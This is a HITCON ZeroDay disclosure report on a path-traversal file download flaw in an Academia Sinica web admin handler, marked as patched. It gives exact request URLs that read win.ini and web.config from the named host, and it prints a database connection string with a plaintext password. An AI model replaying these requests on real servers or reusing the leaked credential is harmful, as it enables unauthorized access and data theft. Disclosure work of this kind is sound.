Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00175
- Vendor: 中央研究院
- Title: 中央研究院近代史研究所 某單位 - Directory Traversal (Physical Path)
- Introduction: 任意檔案下載
- 感謝函
處理狀態
目前狀態
公開
Last Update : 2017/06/13
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2017/02/21 12:17:18 : 新提交 (由 jacky5112 更新此狀態)
- 2017/02/21 19:09:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/03/04 00:46:08 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/03/04 00:46:09 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/04/23 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2017/05/01 12:03:39 : 已修補 (由 HITCON ZeroDay 平台自動更新)
- 2017/06/12 23:50:43 : 確認已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/06/12 23:50:44 : 確認已修補 (由 HITCON ZeroDay 平台自動更新)
- 2017/06/13 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-00175
- 通報者:qoo24571864 (jacky5112)
- 風險:嚴重
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.mh.sinica.edu.tw/MHAdminWeb/SysModule/Admin/PGFileManager_download.ashx
敘述
- 利用 google hacking 發現網頁。
- 參數「filePath」為實體路徑,發現可下載「C:\Windows\win.ini」。
http://www.mh.sinica.edu.tw/MHAdminWeb/SysModule/Admin/PGFileManager_download.ashx?filePath=C:\Windows\win.ini - 下載「web.config」。
http://www.mh.sinica.edu.tw/MHAdminWeb/SysModule/Admin/PGFileManager_download.ashx?filePath=D:\New_Web\MHAdminWeb\web.config - 利用 web.config 資訊登入資料庫。
<add name="CVB.Foundation.Properties.Settings.ConnectionString" connectionString="Data Source=M2K001;Initial Catalog=MH;User ID=mh;Password=Aa123456" providerName="System.Data.SqlClient" />
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。